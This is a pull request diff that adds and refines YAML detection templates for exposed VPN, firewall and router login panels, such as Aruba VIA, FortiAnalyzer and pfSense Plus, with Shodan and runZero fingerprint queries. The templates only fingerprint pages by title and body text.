### PR TITLE
upstream sync (semantic): changes requiring review

### DIFF
--- a/http/exposed-panels/array-networks-ssl-vpn-panel.yaml
+++ b/http/exposed-panels/array-networks-ssl-vpn-panel.yaml
@@ -9,7 +9,7 @@ info:
   reference:
     - https://www.arraynetworks.com/products/ag-series.html
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "Array Networks Pilot Login"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^Array Networks Pilot Login"})
     max-request: 1
     shodan-query: 'http.title:"Array Networks Pilot Login"'
   tags: array-networks,network,panel,ssl-vpn,vpn

--- a/http/exposed-panels/array-networks-ssl-vpn-panel.yaml
+++ b/http/exposed-panels/array-networks-ssl-vpn-panel.yaml
@@ -1,0 +1,32 @@
+id: array-networks-ssl-vpn-panel
+info:
+  name: Array Networks SSL VPN - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    Array Networks AG Series SSL VPN appliances provide enterprise remote access.
+    The web login portal (Pilot) is typically accessible on port 8889 or via /prx/ paths.
+  reference:
+    - https://www.arraynetworks.com/products/ag-series.html
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Array Networks Pilot Login"})
+    max-request: 1
+    shodan-query: 'http.title:"Array Networks Pilot Login"'
+  tags: array-networks,network,panel,ssl-vpn,vpn
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Array Networks Pilot Login"
+          - "Array Networks"
+          - "ArrayOS"
+        condition: or
+        part: body
+      - type: status
+        status:
+          - 200
+        # digest: 490a0046304402205846bcba14f93f18d53df2ecc6303e49c6746acf6c5d6e1268a197ca74da994102202fd9d7cc06dd300ce78dfd97563c3aa4f1989439f50344f49ba69e06dea57a78:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/aruba-via-vpn-panel.yaml
+++ b/http/exposed-panels/aruba-via-vpn-panel.yaml
@@ -9,7 +9,7 @@ info:
   reference:
     - https://www.arubanetworks.com/products/security/remote-access/
   metadata:
-    runzero-match: service["http.body"] matches "/screens/wms/"
+    runzero-match: service["http.body"] matches `action="/screens/wms/wms.login"`
     max-request: 2
     shodan-query: 'http.html:"/screens/wms/" port:4343'
   tags: aruba,hpe,network,panel,via-vpn,vpn

--- a/http/exposed-panels/aruba-via-vpn-panel.yaml
+++ b/http/exposed-panels/aruba-via-vpn-panel.yaml
@@ -1,0 +1,37 @@
+id: aruba-via-vpn-panel
+info:
+  name: Aruba VIA VPN - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    Aruba VIA (Virtual Intranet Access) is HPE Aruba's SSL VPN client and gateway
+    solution. The web management portal exposes a login interface typically on port 4343.
+  reference:
+    - https://www.arubanetworks.com/products/security/remote-access/
+  metadata:
+    runzero-match: service["http.body"] matches "/screens/wms/"
+    max-request: 2
+    shodan-query: 'http.html:"/screens/wms/" port:4343'
+  tags: aruba,hpe,network,panel,via-vpn,vpn
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/screens/wms/wms.cgi"
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<aruba>"
+          - "ArubaOS"
+        condition: or
+      - type: word
+        part: body
+        words:
+          - "/screens/wms/"
+      - type: status
+        status:
+          - 200
+        # digest: 4b0a004830460221009eb3dd3d82f61a84b3872d76e2dc6df436c162c60f491209ea3419767fc2cad8022100aef29d40e51295bcded4a4052ab5cfcbd2efdfad2885f5eb5930a75e7a5d6a34:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/aruba-via-vpn-panel.yaml
+++ b/http/exposed-panels/aruba-via-vpn-panel.yaml
@@ -9,7 +9,7 @@ info:
   reference:
     - https://www.arubanetworks.com/products/security/remote-access/
   metadata:
-    runzero-match: service["http.body"] matches `action="/screens/wms/wms.login"`
+    runzero-match: service["http.body"] matches `action="/screens/wms/wms\.login"`
     max-request: 2
     shodan-query: 'http.html:"/screens/wms/" port:4343'
   tags: aruba,hpe,network,panel,via-vpn,vpn

--- a/http/exposed-panels/cradlepoint-gateway-panel.yaml
+++ b/http/exposed-panels/cradlepoint-gateway-panel.yaml
@@ -10,7 +10,7 @@ info:
   reference:
     - https://cradlepoint.com/products/netcloud-manager/
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "CradlePoint"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^CradlePoint"})
     max-request: 1
     shodan-query: http.title:"CradlePoint" http.html:"Administration Login"
   tags: cradlepoint,detect,gateway,panel,router,vpn

--- a/http/exposed-panels/cradlepoint-gateway-panel.yaml
+++ b/http/exposed-panels/cradlepoint-gateway-panel.yaml
@@ -1,0 +1,32 @@
+id: cradlepoint-gateway-panel
+info:
+  name: CradlePoint Gateway - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    CradlePoint (an Ericsson company) produces cellular-connected SD-WAN and VPN
+    gateway appliances. The web administration interface is commonly exposed on
+    port 8080.
+  reference:
+    - https://cradlepoint.com/products/netcloud-manager/
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "CradlePoint"})
+    max-request: 1
+    shodan-query: http.title:"CradlePoint" http.html:"Administration Login"
+  tags: cradlepoint,detect,gateway,panel,router,vpn
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'CradlePoint'
+          - 'cradlepoint.com'
+        condition: or
+      - type: status
+        status:
+          - 200
+        # digest: 490a0046304402205b6cc90828b8995de2a30cdd88e9e115954641b5a9f0d7d030185667aa6b2aee02200e00baefa26e6624200205427cf538f2f37cd38cd0689e60eb90d1b3fa6de208:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/cyberoam-firewall-panel.yaml
+++ b/http/exposed-panels/cyberoam-firewall-panel.yaml
@@ -1,0 +1,30 @@
+id: cyberoam-firewall-panel
+info:
+  name: Cyberoam Firewall - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    Cyberoam UTM firewall login panel detected.
+  reference:
+    - https://www.cyberoam.com/
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Cyberoam"})
+    max-request: 1
+    shodan-query: 'http.title:"Cyberoam"'
+  tags: cyberoam,firewall,panel,utm
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    host-redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Cyberoam</title>'
+      - type: status
+        status:
+          - 200
+        # digest: 4b0a00483046022100a0c18026699f006781063581a7bebee74325980e53f03bf64e59c18e30caa9d9022100c7082477e145d4ebd5c00c7c9361cc80fab765ade792aa7cbaa4439b111986a7:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/cyberoam-firewall-panel.yaml
+++ b/http/exposed-panels/cyberoam-firewall-panel.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://www.cyberoam.com/
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "Cyberoam"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^Cyberoam$"})
     max-request: 1
     shodan-query: 'http.title:"Cyberoam"'
   tags: cyberoam,firewall,panel,utm

--- a/http/exposed-panels/ddwrt-panel.yaml
+++ b/http/exposed-panels/ddwrt-panel.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://dd-wrt.com/
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "DD-WRT"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^DD-WRT"})
     max-request: 1
     shodan-query: 'http.title:"DD-WRT"'
   tags: ddwrt,panel,router

--- a/http/exposed-panels/ddwrt-panel.yaml
+++ b/http/exposed-panels/ddwrt-panel.yaml
@@ -1,0 +1,28 @@
+id: ddwrt-panel
+info:
+  name: DD-WRT - Router Panel
+  author: rxerium
+  severity: info
+  description: |
+    DD-WRT router management panel detected.
+  reference:
+    - https://dd-wrt.com/
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "DD-WRT"})
+    max-request: 1
+    shodan-query: 'http.title:"DD-WRT"'
+  tags: ddwrt,panel,router
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'DD-WRT'
+        part: body
+      - type: status
+        status:
+          - 200
+        # digest: 4a0a00473045022100d1317ffe27a5fd6321db765156b241801669febf38e6f9c8c01a4020882119090220127ebc7386bba3cb9d34b7cfafafb4fa75310197caed0bc81d3dbdeb78f44af8:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/ecessa-panel.yaml
+++ b/http/exposed-panels/ecessa-panel.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://www.ecessa.com/
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "Ecessa"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^Ecessa$"})
     max-request: 1
     shodan-query: 'http.title:"Ecessa"'
   tags: ecessa,panel,sdwan,wanworx

--- a/http/exposed-panels/ecessa-panel.yaml
+++ b/http/exposed-panels/ecessa-panel.yaml
@@ -1,0 +1,28 @@
+id: ecessa-panel
+info:
+  name: Ecessa WANworX - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    Ecessa WANworX management panel detected.
+  reference:
+    - https://www.ecessa.com/
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Ecessa"})
+    max-request: 1
+    shodan-query: 'http.title:"Ecessa"'
+  tags: ecessa,panel,sdwan,wanworx
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'webmaster@ecessa.com'
+      - type: status
+        status:
+          - 200
+        # digest: 4b0a00483046022100f45b8c68859a34166f9679d07e5bbf7bfdaabd6d1bf6be204fc2df7f9c14f3fd022100df87399983dfe1813c865052555af9f6077583ed23093f8ff6fdef124b68cc92:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/elfiq-panel.yaml
+++ b/http/exposed-panels/elfiq-panel.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://www.elfiq.com/
   metadata:
-    runzero-match: service["http.body"] matches "Elfiq"
+    runzero-match: any(each(service["html.titles"]), {# matches "^Elfiq"})
     max-request: 1
     shodan-query: 'http.html:"Elfiq"'
   tags: elfiq,loadbalancer,panel

--- a/http/exposed-panels/elfiq-panel.yaml
+++ b/http/exposed-panels/elfiq-panel.yaml
@@ -1,0 +1,28 @@
+id: elfiq-panel
+info:
+  name: Elfiq Link Balancer - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    Elfiq Link Balancer management login panel detected.
+  reference:
+    - https://www.elfiq.com/
+  metadata:
+    runzero-match: service["http.body"] matches "Elfiq"
+    max-request: 1
+    shodan-query: 'http.html:"Elfiq"'
+  tags: elfiq,loadbalancer,panel
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Elfiq Link Balancer Management'
+        part: body
+      - type: status
+        status:
+          - 200
+        # digest: 490a00463044022078fa48bc1ad3b519dd4c164ec6e73bdb1b188e51333b5fc6b41abe35a2ce2051022068402e02e198aefa1f30388e3c5baaf289a5ddf512099539dcadd770dbee2c69:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/endian-firewall-panel.yaml
+++ b/http/exposed-panels/endian-firewall-panel.yaml
@@ -1,0 +1,32 @@
+id: endian-firewall-panel
+info:
+  name: Endian Firewall - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    Endian Firewall Community is an open-source UTM (Unified Threat Management) appliance
+    and VPN gateway. The web management interface is commonly exposed on port 10443 with
+    a self-signed certificate.
+  reference:
+    - https://www.endian.com/community/overview/
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Endian Firewall"})
+    max-request: 1
+    shodan-query: 'http.title:"Endian Firewall" port:10443'
+  tags: endian,firewall,network,panel,utm,vpn
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Endian Firewall"
+        part: body
+      - type: status
+        status:
+          - 200
+        # digest: 490a0046304402205ac72fa85070d7fd26d9dfdc6f58c063f41cbb3a80e5e4ae38886958da90505102200d030e59b1ff0d085205abc988b92682bcc407e96f312e3e24761a128e56e403:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/firemon-asset-manager-panel.yaml
+++ b/http/exposed-panels/firemon-asset-manager-panel.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://www.firemon.com/
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "FireMon Asset Manager"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^FireMon Asset Manager$"})
     max-request: 1
     shodan-query: 'http.title:"FireMon Asset Manager"'
   tags: firemon,firewall,panel,vpn

--- a/http/exposed-panels/firemon-asset-manager-panel.yaml
+++ b/http/exposed-panels/firemon-asset-manager-panel.yaml
@@ -1,0 +1,30 @@
+id: firemon-asset-manager-panel
+info:
+  name: FireMon Asset Manager - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    FireMon Asset Manager is a network security management platform that provides visibility, policy management, and compliance reporting for firewalls, routers, and other network security infrastructure.
+  reference:
+    - https://www.firemon.com/
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "FireMon Asset Manager"})
+    max-request: 1
+    shodan-query: 'http.title:"FireMon Asset Manager"'
+  tags: firemon,firewall,panel,vpn
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'FireMon Asset Manager'
+        part: body
+      - type: status
+        status:
+          - 200
+        # digest: 4a0a0047304502200d4b64510f866d9ab59716a3608527611dc3f7634b920c31741736c9bea5eb1a022100d9bfaf3e110be18b77730437ca509602f2e1aaa78de6a811fbb4a3adca70fe7b:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/fortinet-fortianalyzer-panel.yaml
+++ b/http/exposed-panels/fortinet-fortianalyzer-panel.yaml
@@ -1,0 +1,32 @@
+id: fortinet-fortianalyzer-panel
+info:
+  name: Fortinet FortiAnalyzer - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    Fortinet FortiAnalyzer is a centralised log management and analytics platform for
+    Fortinet security devices. The web management console is commonly internet-exposed
+    on ports 443, 10443, 9443, or 4443.
+  reference:
+    - https://www.fortinet.com/products/management/fortianalyzer
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "FortiAnalyzer"})
+    max-request: 1
+    shodan-query: 'http.title:"FortiAnalyzer"'
+  tags: fortianalyzer,fortinet,ics,network,panel,vpn
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "FortiAnalyzer"
+        part: body
+      - type: status
+        status:
+          - 200
+        # digest: 4b0a00483046022100856fd246ddbd32e7ac8639e085b6345f8f4f3277193adbf7e34eeaed5ae09272022100aa29762db20a567e620a9d685ba478565860e6d6f92d4752f06ea9a74c2d0287:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/fortinet-fortianalyzer-panel.yaml
+++ b/http/exposed-panels/fortinet-fortianalyzer-panel.yaml
@@ -10,7 +10,7 @@ info:
   reference:
     - https://www.fortinet.com/products/management/fortianalyzer
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "FortiAnalyzer"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^FortiAnalyzer"})
     max-request: 1
     shodan-query: 'http.title:"FortiAnalyzer"'
   tags: fortianalyzer,fortinet,ics,network,panel,vpn

--- a/http/exposed-panels/headscale-panel.yaml
+++ b/http/exposed-panels/headscale-panel.yaml
@@ -10,7 +10,7 @@ info:
     - https://github.com/juanfont/headscale
     - https://headscale.net
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "headscale"})
+    runzero-match: any(each(service["html.titles"]), {# matches "(?i)headscale"})
     max-request: 1
     shodan-query: http.title:"headscale"
   tags: detect,headscale,panel,vpn,wireguard

--- a/http/exposed-panels/headscale-panel.yaml
+++ b/http/exposed-panels/headscale-panel.yaml
@@ -1,0 +1,31 @@
+id: headscale-panel
+info:
+  name: Headscale - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    Headscale is an open-source, self-hosted implementation of the Tailscale control server.
+    It manages WireGuard-based mesh VPN networks and exposes a web UI for administration.
+  reference:
+    - https://github.com/juanfont/headscale
+    - https://headscale.net
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "headscale"})
+    max-request: 1
+    shodan-query: http.title:"headscale"
+  tags: detect,headscale,panel,vpn,wireguard
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Headscale'
+        condition: or
+      - type: status
+        status:
+          - 200
+        # digest: 4a0a004730450220593ad1bea4cdc02765d5a8ec690f0bdf796bc76cd49ff83a877e5e2a5a0ef1510221009cee1e51898e8409b9d458017266c9518f12b93f07bacc053af101281070b36a:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/hillstone-ssl-vpn-panel.yaml
+++ b/http/exposed-panels/hillstone-ssl-vpn-panel.yaml
@@ -11,6 +11,7 @@ info:
     - https://www.hillstonenet.com/products/next-generation-firewalls/
   metadata:
     max-request: 1
+    runzero-review: REJECT/2026-06-25/No SG-6000 specific web portals found
     shodan-query: 'ssl.cert.subject.cn:"SG-6000" ssl.cert.subject.org:"Hillstone Networks"'
   tags: hillstone,ics,network,panel,ssl-vpn,vpn
 http:

--- a/http/exposed-panels/hillstone-ssl-vpn-panel.yaml
+++ b/http/exposed-panels/hillstone-ssl-vpn-panel.yaml
@@ -1,0 +1,32 @@
+id: hillstone-ssl-vpn-panel
+info:
+  name: Hillstone Networks SSL VPN - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    Hillstone Networks SSL VPN (SG-6000 series) is an enterprise network security
+    gateway with SSL VPN capabilities. The web login portal is frequently exposed
+    on standard HTTPS ports.
+  reference:
+    - https://www.hillstonenet.com/products/next-generation-firewalls/
+  metadata:
+    max-request: 1
+    shodan-query: 'ssl.cert.subject.cn:"SG-6000" ssl.cert.subject.org:"Hillstone Networks"'
+  tags: hillstone,ics,network,panel,ssl-vpn,vpn
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Hillstone Networks"
+          - "hillstonenet.com"
+          - "HILLSTONE NETWORKS"
+        condition: or
+        part: body
+      - type: status
+        status:
+          - 200
+        # digest: 4b0a00483046022100e743d89acc72b25d8a579d6bf1da55bda84bee19f602f6c0c7ea9a6439d150ad02210098c111cbe1e44497dbc911324f93524fb6502c77560ef1d56d8a7366b6e63b5c:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/jotty-page-login-panel.yaml
+++ b/http/exposed-panels/jotty-page-login-panel.yaml
@@ -1,0 +1,27 @@
+id: jotty-page-login-panel
+info:
+  name: jotty·page Login - Panel Detect
+  author: Th3l0newolf
+  severity: info
+  description: |
+    jotty·page login interface was discovered.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cwe-id: CWE-200
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "jotty·page"})
+    max-request: 1
+    shodan-query: http.title:"jotty·page"
+    verified: true
+  tags: discovery,jotty,login,page,panel
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/auth/login"
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "<title>jotty·page</title>")'
+        condition: and
+        # digest: 4a0a00473045022100830e764cd389890590a6a19196a3f72ae1107362ac16421b42d11ea037e7779b02205e09727ebe6fdec3e366dbf33609853a8f2e4a2a4954aaa56d662a7377619da9:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/jotty-page-login-panel.yaml
+++ b/http/exposed-panels/jotty-page-login-panel.yaml
@@ -9,7 +9,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
     cwe-id: CWE-200
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "jotty·page"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^jotty·page$"})
     max-request: 1
     shodan-query: http.title:"jotty·page"
     verified: true

--- a/http/exposed-panels/netgate-pfsenseplus-panel.yaml
+++ b/http/exposed-panels/netgate-pfsenseplus-panel.yaml
@@ -1,0 +1,28 @@
+id: netgate-pfsenseplus-panel
+info:
+  name: Netgate pfSense Plus - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    Netgate pfSense Plus firewall login panel detected.
+  reference:
+    - https://www.netgate.com/
+  metadata:
+    runzero-match: service["http.body"] matches "Netgate"
+    max-request: 1
+    shodan-query: 'http.html:"Netgate"'
+  tags: firewall,netgate,panel,pfsense
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Netgate pfSense Plus'
+        part: body
+      - type: status
+        status:
+          - 200
+        # digest: 4a0a00473045022100df4705e33563a85b18e17ceb9b25e64d16572f344086a0da4148a1bf29ef38880220035f5e945e7a9013b62368d783743ffea199e7454bd1ecfcfcff0d9963aab283:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/netgate-pfsenseplus-panel.yaml
+++ b/http/exposed-panels/netgate-pfsenseplus-panel.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://www.netgate.com/
   metadata:
-    runzero-match: service["http.body"] matches "Netgate"
+    runzero-match: any(each(service["html.titles"]), {# matches "^Netgate pfSense Plus - Login$"})
     max-request: 1
     shodan-query: 'http.html:"Netgate"'
   tags: firewall,netgate,panel,pfsense

--- a/http/exposed-panels/netsweeper-webadmin-panel.yaml
+++ b/http/exposed-panels/netsweeper-webadmin-panel.yaml
@@ -1,0 +1,30 @@
+id: netsweeper-webadmin-panel
+info:
+  name: Netsweeper WebAdmin - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    Netsweeper is an internet content filtering and web policy management platform used by ISPs, governments, educational institutions, and enterprises to enforce acceptable use policies and restrict access to harmful content.
+  reference:
+    - https://www.netsweeper.com/
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Netsweeper"})
+    max-request: 1
+    shodan-query: 'http.title:"Netsweeper"'
+  tags: netsweeper,panel,vpn,webfilter
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Netsweeper WebAdmin'
+        part: body
+      - type: status
+        status:
+          - 200
+        # digest: 4b0a00483046022100d55049ce93fe4581c47cf8ac43e068f1e4912dd1d4cc90b6e179481fe653e44b0221008a6b444d27db3ddfd7629c11fb35454538fe2a653ca61814af3c0b6032021ee2:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/netsweeper-webadmin-panel.yaml
+++ b/http/exposed-panels/netsweeper-webadmin-panel.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://www.netsweeper.com/
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "Netsweeper"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^Netsweeper WebAdmin$"})
     max-request: 1
     shodan-query: 'http.title:"Netsweeper"'
   tags: netsweeper,panel,vpn,webfilter

--- a/http/exposed-panels/nuage-networks-vsp-panel.yaml
+++ b/http/exposed-panels/nuage-networks-vsp-panel.yaml
@@ -1,0 +1,32 @@
+id: nuage-networks-vsp-panel
+info:
+  name: Nokia Nuage Networks VSP - Dashboard Panel
+  author: rxerium
+  severity: info
+  description: |
+    Nokia Nuage Networks VSP (Virtualized Services Platform) is a software-defined
+    networking platform for enterprise and service provider SDN/NFV deployments.
+    The web dashboard is exposed on ports 8443, 9090, or 11443.
+  reference:
+    - https://www.nokia.com/networks/solutions/nuage-networks-virtualized-services-platform/
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Nuage Networks"})
+    max-request: 1
+    shodan-query: 'http.title:"Nuage Networks" ssl.cert.subject.cn:"VSPCA"'
+  tags: network,nokia,nuage,panel,sdn,vpn,vsp
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Nuage Networks"
+          - "Nuage Network"
+        condition: or
+        part: body
+      - type: status
+        status:
+          - 200
+        # digest: 4a0a00473045022100c0fc031f948a83f5a24cb8fbdfb1cf0708fdc2cb5298362bfe8a6c3f0cba9413022021c594fde75666dc7d82ce85d08c9b909e8539635dae2cc30b0777ae47db6c2c:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/nuage-networks-vsp-panel.yaml
+++ b/http/exposed-panels/nuage-networks-vsp-panel.yaml
@@ -10,7 +10,7 @@ info:
   reference:
     - https://www.nokia.com/networks/solutions/nuage-networks-virtualized-services-platform/
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "Nuage Networks"})
+    runzero-review: REJECT/2026-06-25/No results on Shodan, no details on the reference.
     max-request: 1
     shodan-query: 'http.title:"Nuage Networks" ssl.cert.subject.cn:"VSPCA"'
   tags: network,nokia,nuage,panel,sdn,vpn,vsp

--- a/http/exposed-panels/ocserv-panel.yaml
+++ b/http/exposed-panels/ocserv-panel.yaml
@@ -1,0 +1,34 @@
+id: ocserv-panel
+info:
+  name: OpenConnect VPN Server (ocserv) - Detect
+  author: rxerium
+  severity: info
+  description: |
+    OpenConnect VPN Server (ocserv) is an open-source VPN server compatible with
+    Cisco AnyConnect clients. It uses DTLS and TLS for secure connectivity and
+    is commonly exposed on port 443 or 4443. The server header can expose
+    OpenConnect or ocserv-specific markers.
+  reference:
+    - https://gitlab.com/openconnect/ocserv
+    - https://ocserv.gitlab.io/www/
+  metadata:
+    runzero-match: service["http.head.server"] matches "ocserv"
+    max-request: 1
+    shodan-query: '"Server: ocserv"'
+  tags: detect,ocserv,openconnect,panel,vpn
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'ocserv'
+          - 'OCServer'
+        condition: or
+      - type: status
+        status:
+          - 200
+        # digest: 4a0a00473045022100e94691fe1524aec4aa112b49de9c03b3570235436498f0dc13e6848bc1336640022022e60386a69bb1fe7a0fc6a4b7101a8f272a4f18740b38b3688f28a16d4c06f0:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/peplink-incontrol-panel.yaml
+++ b/http/exposed-panels/peplink-incontrol-panel.yaml
@@ -1,0 +1,30 @@
+id: peplink-incontrol-panel
+info:
+  name: Peplink InControl - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    Peplink InControl is a centralised cloud-based SD-WAN and device management platform for Peplink routers and access points, enabling remote configuration, monitoring, and SpeedFusion VPN management across distributed sites.
+  reference:
+    - https://www.peplink.com/products/incontrol2/
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Peplink InControl"})
+    max-request: 1
+    shodan-query: 'http.title:"Peplink InControl"'
+  tags: incontrol,panel,peplink,sd-wan,vpn
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Peplink InControl'
+        part: body
+      - type: status
+        status:
+          - 200
+        # digest: 490a004630440220152204017f3e5dc2cba3b0bd2e7acf9de254fc48cb6056fcb987931e75ad122102207ad2517530867877326729e55bfa83403cbfc517d97ee86f7fd4b75a07369715:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/peplink-incontrol-panel.yaml
+++ b/http/exposed-panels/peplink-incontrol-panel.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://www.peplink.com/products/incontrol2/
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "Peplink InControl"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^Peplink InControl$"})
     max-request: 1
     shodan-query: 'http.title:"Peplink InControl"'
   tags: incontrol,panel,peplink,sd-wan,vpn

--- a/http/exposed-panels/sangfor-iam-panel.yaml
+++ b/http/exposed-panels/sangfor-iam-panel.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://www.sangfor.com/en/product/internet-access-management
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "Sangfor Internet Access"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^SANGFOR Internet Access"})
     max-request: 1
     shodan-query: 'http.title:"Sangfor Internet Access"'
   tags: iam,panel,sangfor,vpn

--- a/http/exposed-panels/sangfor-iam-panel.yaml
+++ b/http/exposed-panels/sangfor-iam-panel.yaml
@@ -1,0 +1,30 @@
+id: sangfor-iam-panel
+info:
+  name: Sangfor Internet Access Management - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    Sangfor Internet Access Management (IAM) is a network access control and web filtering appliance from Sangfor Technologies used for managing internet access policies and user authentication in enterprise environments.
+  reference:
+    - https://www.sangfor.com/en/product/internet-access-management
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Sangfor Internet Access"})
+    max-request: 1
+    shodan-query: 'http.title:"Sangfor Internet Access"'
+  tags: iam,panel,sangfor,vpn
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'SANGFOR Internet Access Management'
+        part: body
+      - type: status
+        status:
+          - 200
